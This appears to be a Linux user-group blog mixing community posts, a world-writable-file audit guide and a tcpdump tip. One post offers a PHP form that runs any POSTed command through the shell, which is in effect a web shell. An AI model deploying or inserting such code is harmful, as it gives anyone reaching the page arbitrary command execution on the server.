3xb055

I just registered and paid to attend foss.my this weekend ! I hope to see and catch up with people and maybe learn a new thing or two. Any other 3bosser going (or alive?

written by adli \\ tags: foss.my, open source

Greetings all to 3bosser and friends of 3boss! I know there’s 10 days left for Ramadhan so lets do our best because this is the best part of it. 

Of course the picture above has nothing to do with Ramadhan, but they are 2nd generation 3bosser allright :-). Ramadhan Mubarak!

written by adli \\ tags: Add new tag

 Saya mengambil peluang ini untuk menjadi pemblog pertama dari kalangan ahli seumur hidup 3boss bagi tahun 2008/Hijrah 1429. 

w00t! Semoga tahun ini lebih baik dari tahun-tahun sebelumnya. Salaam maal hijrah!

written by adli

Dengan kes-kes terbaru kebelakangan ini yang mana hackers selalu berjaya memecah masuk ke server-server web hosting dan menyuntik IFRAME(http://isc.sans.org/diary.html?storyid=3078) secara borong(mass) pasti merisaukan kebanyakkan kita yang mempunyai akaun di web hosting server.
Menurut seorang pakar yang ditemubual dari myCert(http://www.mycert.org.my/), ini adalah akibat dari permisi yang lemah pada fail/direktori yang disetkan pengguna.
Kebanyakkan pengguna menurut beliau tidak memahami bahaya membiarkan permisi world writable pada sesuatu fail.

#ls -l
-rw-r–rwx 1 dminda dminda 6424 Jun 24 15:26 index.html

permisi di atas dengan mudah membiarkan pengguna lain yang mempunyai akaun di server yang sama untuk mengubah kandungan fail tersebut.

Kita boleh menggunakan arahan find -perm untuk mengenalpasti fail yang mempunyai permisi word writable seperti dibawah.
format:

find [path..] [expression]

find /home/dminda/public_html -perm -006

-perm -006 boleh diterjemahkan kepada berikut.
006 -> ——rw-
tanda -(negatif) sebelum 006 boleh diterjemahkan kepada: ******rw* yang mana * adalah wildcard.
Oleh itu ia akan mencari semua fail yang mempunyai permisi o=rw tanpa mengira bit-bit yang lain.

#ls -l
d——rw- 3 dminda dminda 4096 Apr 29 20:51 projek/
d——r-x 4 dminda dminda 4096 Jan 1 2007 public_ftp/
-rwxr-x— 34 dminda dminda 4096 Jul 4 17:21 public.html
-rwxrwxrwx 3 dminda dminda 4096 Mar 16 11:36 setor.html
-rwxr-xr-x 6 dminda dminda 4096 May 2 17:31 ayam.php
-r—-xrwx 5 dminda dminda 4096 Jun 21 21:38 itik.php
-rwxr-x-wx 8 dminda dminda 4096 May 9 08:32 kucing.txt
drwxrwx–x 8 dminda dminda 4096 Mar 26 00:46 timah/
#find . -perm 006
./projek/
./setor.html
./itik.php

Sebenarnya penggunaan find adalah lebih luas dan kompleks dari contoh di atas. Untuk option -perm sahaja mempunyai pelbagai variasi.
-perm 006
-perm +006
-perm -006
-perm /006
Keempat-empat baris diatas mempunyai maksud yang berlainan jika digunakan dalam arahan find. Sila rujuk manual untuk maklumat lanjut.

written by cperdana

  
I bought the June’s edition of Linux For You last weekend. It came with the latest Ubuntu CD. My youngest son kept asking "What  is Spiderman  doing to the Penguin?"

On Sunday I took the kid to the park near our house. I brought the magazine along to show off so I could skim through it while looking after the kids :-). There was a guy near me who came with his 2 year old daughter.  Then all of the sudden he asked:

"Abang guna Linux ke?"

So then we chatted about different distros, torrent software, desktop environment, 3boss and our kids. This weekend we’ll probably have another meetup

written by adli

Salam semua..
php dan bash. Jika mereka bekerja sama, mampu memeningkan kepala sistem admin.
skrip php di bawah memudahkan anda untuk melarikan bash dari php.

berhati2 menggunakannya.

————————————

<?php

$parameter = $_POST['parameter'];
$arahan= $_POST['arahan'];
echo `$arahan $parameter`;

?>
<form method=’post’ action= >
task:<input type=text name=arahan value=’<?php echo $arahan ?>’ >
<br>
param2:<input type=text name=parameter size=200 value=’<?php echo $parameter ?>’ >

<input type=submit value=’berani?’>
</form>

——————————————-

written by cperdana

Anda boleh mengumpul trafik format pcap dengan menggunakan tcpdump. Caranya begini:

$tcpdump -s 1515 -i eth0 -w file_trafik_anda.pcap

Untuk parameter "-i" , anda boleh sesuaikan dengan nama network interface yang digunakan. Mungkin anda ada lebih dari satu (contohnya wireless interface).

Fail yang disimpan boleh dibuka untuk tujuan analisa dengan menggunakan arahan:

$tcpdump -r file_trafik_anda.pcap

Ok cukup dulu untuk kali ini . Selamat mencuba dan Selamat Pengantin Baru untuk Tabib Guasa 3xb055 - En. Raihan.

written by adli

Have a good one!

written by adli

Assalammualaikum and very good day to everyone,

Linux kernel 2.6.18 has oficially got native real-time support thanks to the the work of Ingo Molnar (Red Hat) and Gleixner (TimeSys).  You can read about it here. It is a shame that the newly released Ubuntu Edgy Eft (today!) does not use this new kernel yet.   This is a good news for embedded developers and those using Linux for Multimedia application.

Two words describe the improvement,

                                                                       LINUX ROCKS!

written by teleforce